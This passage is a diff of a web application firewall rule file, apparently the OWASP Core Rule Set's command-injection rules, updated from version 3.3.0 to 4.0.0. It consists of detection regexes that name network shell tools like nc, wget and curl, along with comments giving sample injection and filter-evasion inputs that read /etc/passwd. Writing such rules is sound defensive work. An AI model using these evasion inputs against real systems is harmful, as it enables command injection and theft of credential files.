5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ - "id:932150,\ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \ + "id:932330,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Direct Unix Command Execution',\ + msg:'Remote Command Execution: Unix shell history invocation',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ @@ -456,11 +528,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell snippets ] @@ -471,6 +542,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # have been added here with their full path, in order to catch some # cases where the full path is sent. # +# Rule relations: +# +# .932160 (base rule, PL1, unix shell commands with full path) +# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers) +# # This rule is also triggered by an Apache Struts Remote Code Execution exploit: # [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ] # @@ -482,7 +558,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\ + t:none,t:cmdLine,t:normalizePath,\ msg:'Remote Command Execution: Unix Shell Code Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -493,11 +569,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ] @@ -511,7 +586,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ "id:932170,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:urlDecode,\ @@ -525,11 +600,10 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ "id:932171,\ @@ -547,153 +621,1045 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# [ Unix shell alias detection ] # -# -=[ Restricted File Upload ]=- +# Detects Unix shell alias invocations in any context. # -# Detects attempts to upload a file with a forbidden filename. +# Example: +# GET /?rce=alias%20a=b # -# Many application contain Unrestricted File Upload vulnerabilities. -# https://www.owasp.org/index.php/Unrestricted_File_Upload +# Shell aliasing can be performed to substitute anything in commands, escaping # -# These might be abused to upload configuration files or other files -# that affect the behavior of the web server, possibly causing remote -# code execution. +# References: https://pubs.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap03.html#tag_03_10 : +# "In the shell command language, a word consisting solely of underscores, digits, and alphabetics +# from the portable character set and any of the following characters: '!', '%', ',', '@'." # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ - "@pmFromFile restricted-upload.data" \ - "id:932180,\ +# Implementations may allow other characters within alias names as an extension. +# +# Regular expression generated from regex-assembly/932175.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932175 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s\b[\s\v]+[!-\"%',0-9@-Z_a-z]+=[^\s\v]" \ + "id:932175,\ phase:2,\ block,\ capture,\ - t:none,t:lowercase,\ - msg:'Restricted File Upload Attempt',\ + t:none,\ + msg:'Remote Command Execution: Unix shell alias invocation',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # -# -=[ Rule 932200 ]=- +# -=[ Restricted File Upload ]=- # -# Block RCE Bypass using different techniques: -# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) -# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) -# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# Detects attempts to upload a file with a forbidden filename. # -# Examples: -# - foo;cat$u+/etc$u/passwd -# - bar;cd+/etc;/bin$u/ca*+passwd -# - foo;ca\t+/et\c/pa\s\swd -# - foo;c'at'+/etc/pa's'swd +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload # -# Regex notes: https://regex101.com/r/JgZFRi/7 +# These might be abused to upload configuration files or other files +# that affect the behavior of the web server, possibly causing remote +# code execution. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \ - "id:932200,\ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ phase:2,\ block,\ capture,\ - t:none,t:lowercase,t:urlDecodeUni,\ - msg:'RCE Bypass Technique',\ + t:none,\ + msg:'Restricted File Upload Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rce',\ - tag:'paranoia-level/2',\ + tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain" - SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\ - setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# [ Windows command injection ] # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. # - -# Missing Unix commands have been added to a new word list i.e. -# util/regexp-assemble/regexp-932106.txt -# These commands may have a higher risk of false positives. -# Therefore, they have been split off to a separate rule in PL3. -# For explanation of this rule, see rule 932100. +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# A command injection takes a form such as: # -# Then insert the assembled regexp into this template: +# foo.jpg&ver /r +# foo.jpg|ver /r # -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932106.txt] -# \b" \ +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. # -# This rule is a stricter sibling of rule 932100. - -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:(?:(?:a[\\\\'\"]*p[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*u[\\\\'\"]*d|u[\\\\'\"]*p[\\\\'\"]*2[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t)[\\\\'\"]*e|d[\\\\'\"]*n[\\\\'\"]*f|v[\\\\'\"]*i)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*(?:a[\\\\'\"]*c[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*(?:\s|<|>).*|w[\\\\'\"]*d|s)|w[\\\\'\"]*(?:(?:\s|<|>).*|h[\\\\'\"]*o))\b" \ - "id:932106,\ - phase:2,\ - block,\ - capture,\ - t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-shell',\ - tag:'platform-unix',\ - tag:'attack-rce',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/248/88',\ - tag:'PCI/6.5.2',\ - tag:'paranoia-level/3',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" - +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` # -# -=[ Bypass Rule 930120 (wildcard) ]=- +# Anatomy of the regexp: # -# When Paranoia Level is set to 1 and 2, a Remote Command Execution -# could be exploited bypassing rule 930120 (OS File Access Attempt) -# by using wildcard characters. +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. Paths +# +# [\w'\"\./]+/ /path/cmd +# [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c C:\Program Files\cmd +# [\^\.\w '\"/\x5c]*\x5c)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. +# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932370.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932370 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:c[\"\^]*c[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*c[\"\^]*k[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e|d[\"\^]*(?:p[\"\^]*l[\"\^]*u[\"\^]*s|v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k)|(?:g[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*o|s[\"\^]*p[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*_[\"\^]*c[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*i[\"\^]*l[\"\^]*e)[\"\^]*r|p[\"\^]*p[\"\^]*(?:i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*e[\"\^]*r|v[\"\^]*l[\"\^]*p)|t[\"\^]*(?:[\s\v,\.-/;-<>].*|b[\"\^]*r[\"\^]*o[\"\^]*k[\"\^]*e[\"\^]*r))|b[\"\^]*(?:a[\"\^]*s[\"\^]*h|g[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:d[\"\^]*b|e[\"\^]*r[\"\^]*t[\"\^]*(?:o[\"\^]*c|r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|l[\"\^]*_[\"\^]*(?:i[\"\^]*n[\"\^]*v[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*a[\"\^]*s[\"\^]*s[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*l[\"\^]*y|m[\"\^]*u[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*i[\"\^]*e[\"\^]*r[\"\^]*s)|m[\"\^]*(?:d(?:[\"\^]*(?:k[\"\^]*e[\"\^]*y|l[\"\^]*3[\"\^]*2))?|s[\"\^]*t[\"\^]*p)|o[\"\^]*(?:m[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*s|n[\"\^]*(?:f[\"\^]*i[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*r[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*p[\"\^]*o[\"\^]*l[\"\^]*i[\"\^]*c[\"\^]*y|h[\"\^]*o[\"\^]*s[\"\^]*t|t[\"\^]*r[\"\^]*o[\"\^]*l)|r[\"\^]*e[\"\^]*g[\"\^]*e[\"\^]*n)|r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|s[\"\^]*(?:c(?:[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)?|i)|u[\"\^]*s[\"\^]*t[\"\^]*o[\"\^]*m[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t)|d[\"\^]*(?:a[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|e[\"\^]*(?:f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|s[\"\^]*k(?:[\"\^]*t[\"\^]*o[\"\^]*p[\"\^]*i[\"\^]*m[\"\^]*g[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*d[\"\^]*r)?|v[\"\^]*(?:i[\"\^]*c[\"\^]*e[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*d[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*a[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y[\"\^]*m[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r))|f[\"\^]*s[\"\^]*(?:h[\"\^]*i[\"\^]*m|v[\"\^]*c)|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|s[\"\^]*k[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|n[\"\^]*(?:s[\"\^]*c[\"\^]*m[\"\^]*d|x)|o[\"\^]*t[\"\^]*n[\"\^]*e[\"\^]*t|u[\"\^]*m[\"\^]*p[\"\^]*6[\"\^]*4|x[\"\^]*c[\"\^]*a[\"\^]*p)|e[\"\^]*(?:s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*w[\"\^]*r|